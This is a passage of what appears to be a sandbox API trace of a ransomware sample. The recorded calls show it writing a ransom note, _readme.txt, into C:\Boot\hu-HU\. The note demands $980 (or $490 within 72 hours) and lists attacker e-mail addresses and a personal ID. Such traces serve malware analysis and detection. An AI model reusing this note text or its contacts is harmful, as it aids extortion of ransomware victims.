[0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.212] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0056.212] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.212] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.212] PathFindFileNameW (pszPath="") returned="" [0056.212] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.212] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.212] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.212] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.213] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0056.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.213] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0056.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.213] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.213] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.213] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.214] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.214] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.214] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.214] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.214] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.214] CloseHandle (hObject=0x5c8) returned 1 [0056.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.215] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.215] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.215] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.215] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.215] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.215] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.215] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.216] HeapFree (in: 